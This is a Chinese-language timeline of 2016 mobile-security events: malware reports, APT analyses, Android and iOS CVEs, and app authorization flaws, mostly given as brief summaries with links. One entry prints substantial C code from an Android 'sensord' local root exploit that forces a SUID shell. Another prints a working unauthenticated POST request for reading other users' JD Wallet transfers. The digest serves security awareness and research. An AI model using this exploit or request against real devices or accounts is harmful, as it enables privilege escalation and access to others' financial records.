#2016移动安全事记
时间线
-
0x00
-
1.6 “百脑虫”手机病毒分析报告
于15年末,360移动安全团队发现,以功能模块形式捆绑在各类应用中,可进行提权、替换系统启动脚本、对抗安全工具、静默"推广"应用等。
-
1.8 京东钱包越权查询之任意查看两账户之- 0x间的转账信息
年初,白帽子骑虎打狗在乌云平台上报了一个京东钱包应用的安全漏洞,与服务器方通信上的逻辑设计漏洞+未做认证导致可做越权信息查询。
-
继快播公审后,小米于2016年1月9日发布公告称360安全卫士欺骗用户安装恶意软件雷电OS,篡改MIUI系统签名,影响用户正常升级。为此,MIUI商店已经全线下架360软件。
-
修改了开机画面。
-
重刷了recovery,并且禁止用户使用。防止用户刷回官方系统。
-
预置360安全卫士阉割版,应用商店,浏览器。
-
禁用原有的浏览器,应用商店,系统升级。导致用户永远无法升级。
-
预置了雷电桌面,并且无法修改为原有桌面和第三方桌面,修改后几秒钟会重新启动雷电桌面。
-
修改原有系统签名。改为google的测试签名,导致原有手机的系统应用出现各种问题。
另附知乎讨论,有相关举证。
-
-
1.12 面具恶魔”绕过Root恶意推广
恶意程序,可以在用户手机没有ROOT的情况下,骗取用户下载安装其他程序。这些开发者为了牟利,会在一些热门应用里植入自己开发的模块,当用户启动该程序后,会通过多种手段自动安装其他程序,比如通过激活Android系统自带的Accessibility功能,在Google Play市场上进行模拟点击安装程序,或者通过伪造一个虚假界面骗取用户点击,结果是用户的手机“莫名其妙”被装上自己并不需要的应用,甚至能够安装付费应用,造成经济损失。
-
In mid-August 2015, in an attempt to educate people, Turkish security group Otku Sen published an open source code for ransomware dubbed “Hidden Tear” and made it available for everyone at github. Hidden Tear uses AES encryption and can evade common AV platforms because it’s a new malware. Otku Sen also published a short video demonstrating how ransomware worked.
好吧,这个是PC的,有一定教育意义,先放这吧。样本传送门
-
1.13 PROLONGED ATTACK CHAIN AND BETTER-ORGANIZED CAMPAIGN
Android 银行恶意软件 SlemBunk的跟踪分析
-
1.14 Android.Bankosy All ears on voice call-based 2FA
Symantec早在14年即发现了一个窃取用户金融信息的木马-Android.Bankosy,16年1月,Symantec发现该家族恶意代码增加了针对电话认证双因子的代码,可直接利用电话转接功能窃取用户信息。(这里描述的不够清楚,可看原文。)
-
1.18 Targeted mobile implants in the age of cyber-espionage
卡巴对15年Hacking Team泄漏的针对移动端(包括IOS、Android、Blackberry、Windows Mobile)的间谍软件进行了详细分析。
-
1.18 360-2015年中国高持续性威胁(APT)研究报告
360的APT总结,同时,可以看这里,按时间线来的APT事件分析。
-
通过 BetterCap 工具和 'addJavascriptInterface' 漏洞自动攻击网络内的所有(4.2以下版本的)Android设备
-
1.19 CVE-2016-0728 linux内核提权漏洞,影响版本<=3.8,包括Android
CVE-2016-0728 is caused by a reference leak in the keyrings facility. 由keyring的引用计数溢出问题导致的UAF漏洞——此处可有门。
-
1.21 全球10大声名远扬的黑客组织
备忘,属于团队/组织系列的知识
-
1.21 iOS/OS X syslogd 堆溢出漏洞分析(CVE-2016-1722) 中文版
An incorrect size calculation during memory re-allocation leads to a heap buffer overflow in syslogd when multiple client connections are established.
-
1.22 中国联通沃邮箱等�部分�Android客户端免密码登陆
由白帽子恶人毛在乌云平台上报了联通公司的沃邮箱等相关android应用存在的漏洞,相关应用未做任何认证,直接授权手机登陆(提取到的手机号)相关账号,可利用改号软件任意登陆,并可获取相关账号密码。
-
1.24 Android privilege escalation to mediaserver from zero permissions (CVE-2014-7920 + CVE-2014-7921)
Android 提权:结合两个漏洞(CVE-2014-7920 + CVE-2014-7921)实现 MediaServer 进程内的任意代码执行
-
1.* 疑似某基于运营商流量的APK劫持推广系统存漏洞(每天高达百万计的劫持数据统计)
1月8日由"路人甲"在乌云平台上报,2月22日向所有人公开,要用镜像了。
-
1.25 绕过沙盒demo:非越狱手机删除任意app以及 获取微信聊天记录
微博视频中展示了该demo在非越狱情况下,删除其他app(重启后图标消失)&窃取微信聊天信息(db);同时,苹果将修复由360涅槃团队提交的“冰火穿越”漏洞
-
1.26 iOS冰与火之歌 – Objective-C Pwn and iOS arm64 ROP
这篇文章简单介绍了iOS上Objective-C的利用以及iOS上arm64ROP,这些都是越狱需要掌握的最基本的知识。乌云已崩,相关代码已开源iOS_ICE_AND_FIRE
-
-
0x01
-
盘古技术人员对所修复的漏洞中,一个能够绕过地址随机等保护机制完全攻破内核(可被用于越狱)的漏洞进行了细节分析分享,讨论编写利用的一些思路
-
2.16 10 Years of Mac Malware: How OS X Threats Have Evolved [Infographic]
从2006年至2016年,十年间在OSX&iOS上出现的病毒。时间线整理,虽然是广告,但是图还是可以看看的。
-
2.17 盘点2015年度10大安卓手机系统级病毒
-
2.17 Smile! You’re on Candid APT
对公共监控摄像的Hack.由于公共监控摄像的后台管理登陆账号密码均为默认,还可设定配置以支持ssh远控……
-
2.18 New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom
This Trojan, which is still under development and regularly updated, is already capable of multiple malicious behaviors. It tries to steal victims’ banking credentials and credit card information via phishing pages crafted to mimic Google Play’s payment interface as well as the login pages of 7 different banks’ apps. It can also remotely lock infected Android devices,
-
2.18 iOS冰与火之歌番外篇 - 在非越狱手机上进行App Hook
在非越狱手机上进行App Hook
-
2.18 闭路电视DVR的破解过程
主要描述了闭路电视DVR的攻击破解过程。
-
影响Android内核的最新版本,可以用来提权,带POC。
-
2.19 In the Wild: Mobile Security Observations from the Check Point Research Team
MazarBot is the first mobile malware to use TOR to communicate anonymously.
Like its sibling, LIBSKIN initiates a rooting process through a module called right_core. The malware then pops up ads in changing intervals in order to hide which app from which these pop-ups pop.
-
通过几个方案的脑洞,推论出无法盗刷Apple Pay。
-
文章源切换为:https://wystatic.ictf.pw/static/bugs/wooyun-2016-0168304.html
网络访问请求无任何认证,直接提交帐号ID即可获得相关数据。POST https://m.wangyin.com/ryze/transferRecord {"desCustomerId":"360000000064845496","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000051318036","macAddress":"","auth":"","userId":"1000000003607","clientName":"","deviceId":"","version":""}
-
2.22 Recent MazarBot targeting the MobilePay can lock and erase your device
伪基站短信+钓鱼界面。
-
2.22 来自黑产的新年“问候”
1、先用红包做诱饵,借新年这一时机进行传播。随后又对源码做了修改,变成了过年聚会相册传播,非常精准的把握住了大家的心理。做黑产也确实挺拼的……
2、批量注册域名、生成短链接,多线传播。
3、对用户访问终端做严格判断,提高传播效率。
4、除了冒用用户名义滥发短信,分析未发现搜集用户信息行为,是否放马者只是牛刀小试,还有后续动作?
-
2.22 PoS Malware: All You Need to Know
POS机上的恶意代码,值得关注。
Name Abilities PoSeidon malware Sophisticated method to find card data. Self-update ability to execute new code. Effective measures to protect its code from analysis. The malware belongs to the “scrapers” family. Implementation of the Luhn formula to verify card validity. Use a Keylogger module. NewPosThings malware Efficient memory scraping process. Custom packer and new anti-debugging mechanisms. Implements the ability to harvest user input. To obtain persistence, it uses a registry entry with the name “Java. Update Manager”. Disables the warning messages used by the OS. Implementation of the Luhn formula to verify card validity. d4re|dev1| malware Mass Transit Systems. Allows remote control of victims. Implements functionalities of RAM scrapping and keylogging features. Allows loading of additional payloads through “File Upload” option for lateral movement inside the local network. -
2.23 安卓恶意软件GM Bot源代码被公开
监视受害者 从受感染设备删除数据 驻足系统 拨打电话给手机联系人 读取手机状态 影响手机控制键 感染Chrome浏览器 更改手机设置 强制手机进入睡眠模式 查询网络状态 获取网络链接 清除设备存储空间(这款恶意软件最具破坏性的能力)
https://securityintelligence.com/android-malware-about-to-get-worse-gm-bot-source-code-leaked/ 有指令详细分析
http://thehackernews.com/2016/02/android-malware-source-code.html
-
2.23 Acecard移动木马的进化
http://news.kaspersky.com.cn/news2016/02n/160222.htm
Acecard木马家族的恶意软件几乎使用目前所有的恶意软件功能,从窃取银行短信和语音信息到利用假冒的登陆信息覆盖官方应用窗口,试图窃取用户的个人信息和账户详情。最新版的Acecard木马能够攻击约30家银行和支付系统的客户端应用。考虑到这种木马能够根据指令,覆盖任何应用的窗口,所以遭受攻击的金融应用整体数量可能会更多。
除了银行应用外,Acecard还能够利用钓鱼窗口覆盖以下应用:
即时通讯服务:whatsApp、Viber、Instagram和Skype; 社交网络:Vkontakte、Odnoklassniki、Facebook、Twitter; Gmail客户端; PayPal移动应用; Google Play和Google Music应用。
-
2.23 艾媒咨询:2015-2016中国移动安全市场年度报告
- 移动端安全问题越发突出
- 物联网成为新威胁
- 复杂加密技术将更普及
- 个人隐私问题更受重视
- 安全手机或安全系统
- 开发者安全不容小觑
- 一站式手机安全软件更受青睐
- 手机预装软件问题严重
-
2.23 开智能锁
APP网络请求的认证不严格,维修公司的网站信息不保密等漏洞导致的问题。
-
2.24 公司wifi安全
重定向:http://drops.xmd5.com/static/drops/wireless-12944.html
第一步:设定WiFi无法访问内部网络 第二步:员工内部培训,避免暴露公司内网入口(随身WiFi、网络认证证书、家庭网络vpn等)
-
http://www.bbc.com/news/technology-35642749 http://bobao.360.cn/learning/detail/2761.html
-
2.26 破解一款流行的4G Modem
-
2.26 通用型微信抢红包神器
-
2.26 Windows Mobile Application Security Testing
http://anandsecurity.blogspot.jp/2016/02/windows-mobile-application-security_22.html http://anandsecurity.blogspot.jp/2016/02/windows-mobile-application-security_95.html http://anandsecurity.blogspot.jp/2016/02/windows-mobile-application-security_24.html
-
Practical Attacks Against Privacy and Availability in 4G/LTE Mobile Communication Systems
-
2.29 营商DNS劫持
http://securityaffairs.co/wordpress/44893/hacking/chinese-isps-serve-malware-ads.html
-
-
0x02
-
3.1 OSX SIP机制的“那些事”
-
3.6 New OS X Ransomware KeRanger Infected Transmission BitTorrent Client Installer
-
3.7 APP安全之伐木累任意用户登录
-
3.7 通过siri饶过ios v9., v9.1 & v9.2.1,也有人评论说不是通过SIRI饶过的,是在按IPHONE键的时候,指纹解锁的
-
3.8 警惕黑产利用企业邮箱团伙作案
-
3.8 360-“舞毒蛾”木马演变报告
-
3.9 Android banking trojan masquerades as Flash Player and bypasses 2FA(安卓银行木马伪装成Flash Player)
-
3.10 SlemBunk木马浅析
-
3.10 海航旗下某APP任意用户密码重置
-
3.13 Android sensord day root exploit (tested on LG L7 (PL)�
void disable_autorotate() { printf("[+] Disabling auto-rotate...\n"); system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0"); } void first_step() { if( access(FIFO_DAT, F_OK) != -1 ) { unlink(FIFO_DAT); } char path[1024]; get_system_dev(path, sizeof(path)); symlink(path, FIFO_DAT); printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n"); } void second_step() { char path[1024]; struct stat s; unlink(FIFO_DAT); stat(SH, &s); printf("[+] Looking for inode no.: %llu\n", s.st_ino); get_system_dev(path, sizeof(path)); int fd = open(path, O_RDWR); if( fd != -1 ) { int inodeno = s.st_ino; struct ext4_super_block super; struct ext4_group_desc group_descr; struct ext4_inode inode; unsigned long int offset=0; lseek(fd, 0x400, SEEK_SET); read(fd, &super, sizeof(super)); int block_size = 1024 << super.s_log_block_size; int bg = (inodeno-1) /super.s_inodes_per_group; lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET); read(fd, &group_descr, sizeof(group_descr)); unsigned int index = (inodeno-1) % super.s_inodes_per_group; unsigned int off = index * super.s_inode_size; unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off; lseek(fd, total_offset, SEEK_SET); read(fd, &inode, sizeof(struct ext4_inode)); if(inode.i_size_lo == s.st_size) { __le16 mode = 0; printf("[+] Found inode!\n"); lseek(fd, total_offset, SEEK_SET); inode.i_mode = inode.i_mode | 0x800; int modesize = sizeof(inode.i_mode); int wr = write(fd, &inode.i_mode, modesize); if( wr == modesize ) { printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH); } else { printf("[-] Can't set bit SUID on %s\n", SH); } } else { printf("[-] Can't find inode!\n"); } close(fd); } else printf("[-] Can't open %s!\n", path); } void third_step() { char path[1024]; //chmod(SH, 4755); setuid(0); setgid(0); if(getuid() == 0) { get_system_dev(path, sizeof(path)); chmod(path, 0600); printf("[+] Rooted!\n"); system(SH); } else { printf("[-] No root here!\n"); exit(0); } } bool verify() { DIR* dir; struct dirent *entry; char spath[512]; bool res = false; struct stat s; dir = opendir("/proc"); if(dir) { while ((entry = readdir(dir)) != NULL) { if (entry->d_type == DT_DIR) { snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name); if (isSensord(spath)) { stat(spath, &s); if (s.st_uid == 0) res = true; break; } } } closedir(dir); } return res; }
-
Metaphor - 为 Stagefright 写一个能绕过 ASLR 的 Exploit,CVE-2015-3864
-
3.15 浅谈移动APP攻击
-
3.16 AceDeceiver: First iOS Trojan Exploiting Apple DRM Design Flaws to Infect Any iOS Device
第一个利用apple drm设计漏洞的ios木马影响任意IOS设备 https://paloaltonetworks.app.box.com/s/9glj43hyba08iql88e6d2sy36tvm5vk5
-
3.16 运营商的这个功能也许帮了黑客大忙
-
3.16 360-盘点手机APP扣费陷阱 - 3.16 iOS冰与火之歌番外篇 - App Hook答疑以及iOS 9砸壳
-
3.21 New adware for Android attacked firmware and apps by well-known companies
-
3.21 Google 最近发现了一个 Android Root 应用,该应用利用一个本地提权漏洞实现 Root(CVE-2015-1805), 漏洞公告
某个 Root 应用会利用部分 Android 设备上的内核中某个未被补丁程序修复的本地提权漏洞 (CVE-2015-1805)。
-
3.21 some points on CVE-2015-1805
pipe.c
pipe_iov_copy_to/from_user在处理readv/writev时,
对当前已经拷贝的buffer长度统计可能与pipe_read/pipe_write不同步,
导致"iovec overrun",构造内存后可造成任意内核地址写
同时讲解了POC
-
3.21 成人之美APP任意用户密码重置
-
3.22 The Price of Free:Privacy Leakage in Personalized Mobile In-App Ads
-
3.23 深度解读“短信拦截马”的黑产利益链
-
3.24 Nexus Android Devices Vulnerable to Rooting Application, Permanent Compromise
-
3.24 Android Stagefright 漏洞补丁的数据分析, 包括各个国家的修复比例对比(CVE-2015-1805等)
-
3.24 Android libstagefright CVE-2016-0816 和 CVE-2016-0824 漏洞的细节, 来自 CENSUS 的漏洞公告
-
3.24 利用任务调度特性检测Android模拟器
-
3.25 APP程序中的短信验证码真的安全么?
-
3.25 伪基站识别技巧(一)
-
3.28 In The Wild: Mobile Security Observations from the Check Point Research Team
-
3.28 Taking a Deeper Dive into Leech: One of the Three Families of Malware Dubbed as Triada
-
3.28 Android 呼叫管理应用 Truecaller 存在远程可以利用的漏洞, 1 亿 Android 设备受影响
-
3.30 CVE-2015-1805 漏洞允许攻击者永久性地 Root Android 手机, 来自 TrendMicro 的分析
While there have been recent rooting exploits such as TowelRoot (CVE-2014-3153), PingPongRoot (CVE-2015-3636) that gain root privileges, this latest flaw features a gaping hole that cybercriminals will try to attack.
-
3.31 App环境分离的实现:Android篇
-
3.31 三种经典iPhone上网络抓包方法详解
-
0x03
-
4.1 图说安全/指纹识别那些事儿
-
4.1 Most prevalent Android ransomware in the West arrives in Japan
-
4.1 An Investigation Into the Use of Common Libraries in Android Apps
-
4.1 利用 SideStepper 漏洞,可以实现 iOS 设备和 MDM 工具之间的中间人攻击,攻击者可以向手机安装新的配置或者是 CA 根证书
-
4.1 探秘国内地下数据交易市场
-
4.2 Having fun with secure messengers and Android Wear (and Android Auto)
Android 几款通讯应用、Android Wear 与 PendingIntent 相关的攻击面 ︰
-
4.4 本月的 Android 补丁更新中修复了一个 Root 应用中使用的漏洞(CVE-2015-1805)
对于3-20号的CVE-2015-1805的事情播报。
-
4.4 ‘SURREPTITIOUS SHARING’ ANDROID API FLAW LEAKS DATA, PRIVATE KEYS
-
4.5 Apple iOS 9.3.1 (iPhone 6S & iPhone Plus)-(3D Touch) 锁屏密码绕过漏洞
-
4.5 在Google Play Store 的超过 100 款 Android Apps 中发现了 Android.Spy.277.origin 木马:
-
4.6 网络犯罪与暗网(Deep Web) - TrendMicro 对多个国家的分析报告 ︰
https://twitter.com/TrendMicro/status/717094398048206849/photo/1
-
4.7 Introducing Metaphor: Another Android Stagefright exploit
-
4.7 Apple fixes iPhone passcode bypass flaw server-side, without having to push out an update1
-
4.8 How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication
还有文章参考:http://www.few.vu.nl/~vvdveen/bandroid.html http://www.theregister.co.uk/2016/04/08/google_android_2fa_breakable/
http://www.securityweek.com/two-factor-authentication-bypassed-simple-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29 -
4.8 Qihoo 360: Just the Tip of the Whitelisted Malware Iceberg
-
4.9 Android IOMX getConfig/getParameter 信息泄漏漏洞(CVE-2016-2417)
https://bugs.chromium.org/p/project-zero/issues/detail?id=711 https://www.bugscan.net/#!/x/21969
-
4.9 “Evil Skype” Malware Kit “Su-A-Cyder” Lets Attacker Spy on Apple Devices
-
4.9 All Your Browsers Belong To Us, 来自 rotlogix 在 Infiltrate 会议的演讲,谈 Android 浏览器漏洞利用:
-
4.10 漏洞之王”一年可以赚多少外快?
-
4.11 Android users beware: Hackers are up to dirty new tricks
-
4.11 New post: Mobile Devices Used to Execute DNS Malware Against Home Routers
-
4.11 图解CVE-2015-1805
-
4.11 New blog post: Discover the Unknown: Analyzing an IoT Device
-
4.12 通过BT种子传播到安卓手机的下载者
-
4.12 Android勒索软件研究报告
-
4.12 黑客事件中如何实现利益最大化?
-
4.13 趣火星之支付宝、网银盗刷事件分析
-
https://twitter.com/symantec/status/719872727927164928/photo/1
-
Android Minikin 库越界写拒绝服务漏洞分析(CVE-2016-2414 ), 来自 Fortinet Blog
-
4.14 经验分享:挖洞联盟第一季漏洞精选
-
4.14 Malvertisements on “Fappening” forum lead to Android Ransomware
-
4.15 Hardening Measures in Android N Cripple System Utility and Security Applications
-
4.15 Beginners Guide to OSINT – Chapter 1 "OSINT(开源威胁情报)入门 第一章:
-
We’ve just open-sourced some sweet iOS tools to help you easily find and fix memory leaks.
Facebook 开源了一套自动化检测 iOS 内存泄露的工具, 来自 Facebook Blog:
-
Blackhat Asia 2016 放出的iOS恶意PoC生成工具, 整合了非常非常有名的Cycript, Theos框架
-
Ethernet Connected Remote Wifi Sniffing Station with an ESP8266 Module
以太网连接的远程 WiFi Sniffer 设备(基于 ESP8266 芯片) : Github Repo
-
4.18 How I defeated an obfuscated and anti-tamper APK with some Python and a home-made Smali emulator
怎样用 Python 和自制 Smali 模拟器搞定一个加混淆、防篡改的 APK︰
-
4.18 A look inside Hacking Team's Latin American empire
Hacking Team 的拉丁美洲帝国
-
4.18 Neutrino Exploit Kit Analysis and Threat Indicators"SANS 发表的《 Neutrino Exploit Kit 分析白皮书》:
-
4.18 Trojan adware hits budget Androids – and some well-known apps
-
4.18 Malvertisements on “Fappening” forum lead to Android Ransomware
-
在针对印度的 'C-Major' 信息窃取行动中,攻击者也会通过手机端窃密,包括使用 Android 和 BlackBerry 间谍软件
-
一篇关于 GSM Hacking 的 Paper: 《移动手机网络与德国混沌计算机俱乐部》:
-
4.19 “小马激活”病毒新变种分析报告
-
4.19 果粉请注意,上威锋网当心遭遇“挂马”攻击
-
4.19 观察8个apt组织的活动
-
4.19 MULTIGRAIN – Point of Sale Attackers Make an Unhealthy Addition to the Pantry
-
4.19 “Operation C-Major” Actors Also Used Android, BlackBerry Mobile Spyware Against Targets
-
4.20 "Multigrain" PoS Malware Exfiltrates Card Data Over DNS
-
4.20 CVE-2016-0846分析
-
WhatsApp vs Telegram | Fortinet Blog
从安全性方面比较 WhatsApp 和 Telegram 4.15
-
Simplify - 通用型 Android 反混淆工具
-
4.21 Fix for CVE-2016-0815 Android stagefright RCE Looks exactly same bug as "DRMfright" Oct/2015
Android CVE-2016-0815 stagefright RCE 漏洞的 Patch 看起来和 2015 年 10 月的 "DRMfright" 像是同一个:https://github.com/programa-stic/security-advisories/tree/master/Android/Stagefright/CVE-2015-3873
-
Android CVE-2016-1621 漏洞的 Patch, 看起来像是 .MKV 文件解析时的整型符号处理问题
-
如果想评估一个 Android 漏洞的影响, OpenSignal 公司的这些 Android 数据可以帮助你
-
4.22 The Ghost Dragon (APT group) Ghost Dragon APT 组织,主要攻击目标为中国和俄罗斯。来自 Cylance 的分析:
-
Uploaded my iOS of Sauron: How iOS Tracks Everything You Do presentation from @ BSidesNOLA
iOS 是如何跟踪你做的每一件事的,来自 BSidesNOLA 会议:
-
su-a-cyder - An Home-Brewed iOS Malware PoC Generator su-a-cyder
iOS 恶意软件 PoC 生成器 来自会议 BlackHat Asia 2016 会议上讲过这个工具,https://www.blackhat.com/docs/asia-16/materials/asia-16-Tamir-Su-A-Cyder-Homebrewing-Malware-For-iOS-Like-A-B0SS.pdf
-
4.24 MazarBOT Android Malware Distributed via SMS Spoofing Campaign
-
4.25 Threat of Mobile Malware Continues to Grow as ‘HummingBad’ Attacks
-
4.25 Towelroot和hackingTeam中泄露的exploit被用于投递andorid Dogspectus 恶意欺诈软件
BLUE COAT发现了一款欺诈软件,利用Towelroot和hackingTeam中泄露的exploit做静默下载和安装。
-
4.25 This is a great list of threat intel resources
其中有一个 Github 项目整理了一个列表: https://github.com/hslatman/awesome-threat-intelligence
-
4.25 Threat of Mobile Malware Continues to Grow as ‘HummingBad’ Attacks
-
4.26 RuMMS: The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing
-
从 0 到 TrustZone 系列文章: 第一篇 探究高通的 SEE(安全可执行环境),来自 Bits, Please Blog:
-
The Wild: Google Can’t Close the Door on Android Malware | Check Point Blog
Google 也无法关上 Android 恶意软件的大门:
-
4.27 2015中国互联网网络安全态势综述
-
4.27 支付宝木马安卓短信窃取者分析
-
4.28 2016中国伪基站短信研究报告
-
4.28 Android infostealer posing as a fake Google Chrome update
-
4.29 Linux IPC router binding any port as a control port (CVE-2016-2059)
Linux IPC Router 绑定任意端口为控制端口 (CVE-2016-2059), 漏洞公告
-
0x04
-
5.3 Crafting your way through JSON Web Tokens
JWT 方式在保护资源时不够安全, JWT 签名所用的密钥可被穷举:
-
5.3 Google has flipped the switch on default HTTPS support for Blogspot sites
Google 为 Blogspot 网站开启默认 HTTPS:
-
https://threatpost.com/cisco-patches-critical-telepresence-vulnerability/117866/
-
5.4 Malware may abuse Android’s accessibility service to bypass security enhancements
-
5.4 McAfee 研究团队在 GooglePlay 中发现了一种新的恶意软件 - Android/Clicker.G,其攻击的目标为俄罗斯用户
https://twitter.com/McAfee_Labs/status/728031980802220033/photo/1
-
5.4 Android stagefright libavc H.264 decoder 内存越界写漏洞(CVE-2016-0842)
-
5.4 McAfee 研究团队在 GooglePlay 中发现了一种新的恶意软件 - Android/Clicker.G,其攻击的目标为俄罗斯用户
https://twitter.com/McAfee_Labs/status/728031980802220033/photo/1
-
5.4 Android stagefright libavc H.264 decoder 内存越界写漏洞(CVE-2016-0842)
-
5.4 SS7协议:黑客如何找到你
-
5.5 CryptXXX 勒索软件用一种新的 Packer 来保护自己, 来自 Sentinelone Blog 对这个新壳的分析
-
5.5 Android 高通 netd 守护进程缺乏对参数的校验,存在本地提权漏洞(提权至 radio 用户权限)(CVE-2016-2060)
https://twitter.com/FireEye/status/728223675380604929/photo/1
-
5.5 数据泄露报告的攻击签名森林
-
5.5 缓解密码攻击,在云中保护身份认证
-
5.5 CryptXXX 勒索软件用一种新的 Packer 来保护自己, 来自 Sentinelone Blog 对这个新壳的分析
-
5.5 Android 高通 netd 守护进程缺乏对参数的校验,存在本地提权漏洞(提权至 radio 用户权限)(CVE-2016-2060)
https://twitter.com/FireEye/status/728223675380604929/photo/1
-
5.6 如何核实大规模的数据泄露事件
-
5.6 [iOS API与取证-有些APP使用NSURLRequest处理HTTP请求,而NSURLRequest会将数据写入缓存](https://blog.silentsignal.eu/2016/05/06/ios-http-cache-analysis-for-abusing-apis-and-forensics/3.5 Devices)
-
5.7 在 iOS 8 系统,如果被 Patch 后的内核支持 task_for_pid0, 那可以通过 Timing Attack 在沙箱内实现越狱检测, 一个检测工具
-
5.9 Viking Horde: A New Type of Android Malware on Google Play
-
5.10 TinyLoader 是如何传播 AbaddonPOS 和 TinyPOS 的 - 5.11 Results of PoC Publishing
-
5.12 高科技恐怖分子所用的隐蔽通信技术
-
CF-Auto-Root - 跟踪最新的 Android Root 信息
记录了ODIN flashable devices和Fastboot flashable devices,并提供了工具
-
全志科技(Allwinner)Linux 定制内核被发现了 Root 后门
The howler is the work of Chinese ARM SoC-maker Allwinner, which wrote its own kernel code underneath a custom Android build for its devices.
Its Linux 3.4-based kernel code, on Github, contains what looks to The Register like a debug mode the authors forgot to kill.
-
5.12 攻击触摸屏基于手势的认证
-
5.12 Banking Trojan infected dozens of Android apps worldwide
-
5.13 Fake Baidu Root/Superuser App Appears in Famous App Markets and Stashes in Android System App Folder
文章已撤除。
-
5.14 高级恶意软件
-
5.16 深入分析跨平台网络电信诈骗
-
5.16 Mobile Malware Hits Google Play, Hundreds of Users Affected
-
5.17 A politically motivated information stealing adversary
Mofang - 具有潜在政治动机的攻击组织(几乎确定来自中国)
-
5.17 一款名叫 'Black Jack Free' 的银行木马通过 Google Play Store 的审查并上架,有 5000 人下载了该木马应用。后来被 Lookout Security 团队发现
-
5.17 ATM机又遭劫难:”隐形”盗读器横空出世
-
5.21 Android N 在安全方面的一些改进
-
5.24 Google to kill passwords on Android, replace 'em with 'trust scores
-
5.24 厄瓜多尔Banco del Austro银行被黑,约1200万美金被盗
SWIFT被攻击事件;高调的黑客针对性的攻击银行 SWIFT 系统
-
5.25 如何用蜜罐追踪黑客(第一集)
-
5.25 2016年Q2《网络安全创新500强》榜单解读
-
5.26 Android Banking Trojan ‘SpyLocker’ Targets More Banks in Europe
-
5.26 "SandJacking" Attack Allows Hackers to Install Evil iOS Apps
-
5.27 Beware the Android Adult Player app - ransomware lies within!
-
5.30 内部威胁那些事儿(三):信息窃取
-
-
0x05
-
6.2 移动平台千王之王大揭秘
-
6.7 Android 内核多个漏洞的 PoC
-
6.7 Android Trojan Hijacks Browsers to Redirect Users to Custom URLs
-
6.8 假网银App如何使用“迷惑计”
-
6.8 网络安全趋势的10大关键点
-
6.10 专为俄罗斯定制的银行木马 - Lurk
-
6.12 Hackers Find Clever Way to Bypass Google's Two-Factor Authentication
-
6.13 2016 巴西奥运会期间的网络威胁
-
6.13 Vawtrack Banking Trojan Is Alive and Well, v2 Recently Discovered
-
6.14 又一款存在风险的 iOS 广告 SDK - Vpon,攻击者可以实现远程截屏、录音、位置获取等,App Store 中 36 款 APP 受影响
-
6.14 骗子可以通过非接触式设备克隆支付卡
-
6.16 思科无线套件存在一个严重的漏洞,可以通过特殊构造的 HTTP 请求远程攻击,以 ROOT 身份执行代码,而且可以盗用用户的 Cookie,目前没有可用的补丁
The vulnerability is due to insufficient sanitization of HTTP user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request with custom user data. An exploit could allow the attacker to execute arbitrary code with root-level privileges on the affected system, which could be leveraged to conduct further attacks
To determine whether the remote management feature is enabled for a device, open the web-based management interface for the device and then choose Basic Settings > Remote Management. If the Enable check box is checked, remote management is enabled for the device.
-
6.17 新型钓鱼-利用OAuth钓鱼
-
6.17 黑客使用社会工程学绕过双因子验证
-
6.17 Banking Trojan targets clients of Russian financial institutions
-
6.19 攻击者使用百万IP破解金融服务
-
6.20 巴西的 '银行木马即服务' 产业链条
-
6.20 一条红线与中.国的网络间.谍攻击分析报告
-
6.21 Android 恶意软件家族 Godless 利用多个 Exploits Root Android 设备
Godless is reminiscent of an exploit kit, in that it uses an open-source rooting framework called android-rooting-tools. The said framework has various exploits in its arsenal that can be used to root various Android-based devices. The two most prominent vulnerabilities targeted by this kit are CVE-2015-3636 (used by the PingPongRoot exploit) and CVE-2014-3153 (used by the Towelroot exploit).
-
6.24 IP whois介绍和部署实践
-
6.28 RuMMS - 通过短信传播的 Android 视图覆盖恶意软件
该应用伪装成系统短信应用 ,程序运行会一直弹窗请求激活设备管理器,隐藏图标,后台联网上传用户设备相关信息以及短信信息,并获取指令执行拦截短信、发送短信、恢复出厂设置等行为,打开一个虚假的银行支付界面诱骗用户输入相关隐私信息并上传,造成用户隐私泄露和资费消耗。
-
6.30 Arbor 安全团队发布报告 400Gbps IoT DDoS 攻击的背后是 Lizard Squad 组织
Researchers at the Arbor’s Security Engineering and Response Team (ASERT) say publicly released source code of the LizardStresser botnet in 2015, by the Lizard Squad DDoS group, is behind the attacks. In a report released this week, ASERT says an unknown group of cybercriminals are running this latest iteration of the LizardStresser botnet via approximately 100 command-and-control servers, manipulating about 1,300 webcams and launching attacks as large as 400Gbps.
-
0x06
-
7.1 6 Banking Trojans Hit Canada: Dridex, Gootkit, Kronos, Ursnif, Vawtrak, and Zeus
-
来自前两天龚广在 MoSec 2016 会议
-
统计数据
-
7.7 NetTraveler - 针对俄罗斯及其邻国的 APT 攻击行动
The actor utilizes spear phishing campaigns to deliver NetTraveler, also known as TravNet. First observed as early as 2004, NetTraveler is a Trojan used widely in targeted attacks. We believe that this attacker operates out of China. In addition to Russia, targeted regions include neighboring countries such as Mongolia, Belarus, and other European countries. The spear-phishing campaigns we detected use links to RAR-compressed executables and Microsoft Word attachments that exploit the CVE-2012-0158 vulnerability.
-
7.11 躲不掉的红色炸弹,这次真的「爆」了(伪装成婚宴电子请帖的钓鱼短信)
一个简单的拦截马分析报告 。
-
7.11 通过 YouTube 视频中内嵌的语言命令黑掉智能手机
利用siri或google now的语音控制,播放可识别的音频达到远控其他手机的目的(发短信等)。
-
7.12 白象的舞步 - 来自南亚次大陆的网络攻击,来自安天实验室
这个不多做描述吧,一个APT分析的报告。
-
7.14 Neutrino EK 来袭,爱拍网遭敲诈者病毒挂马
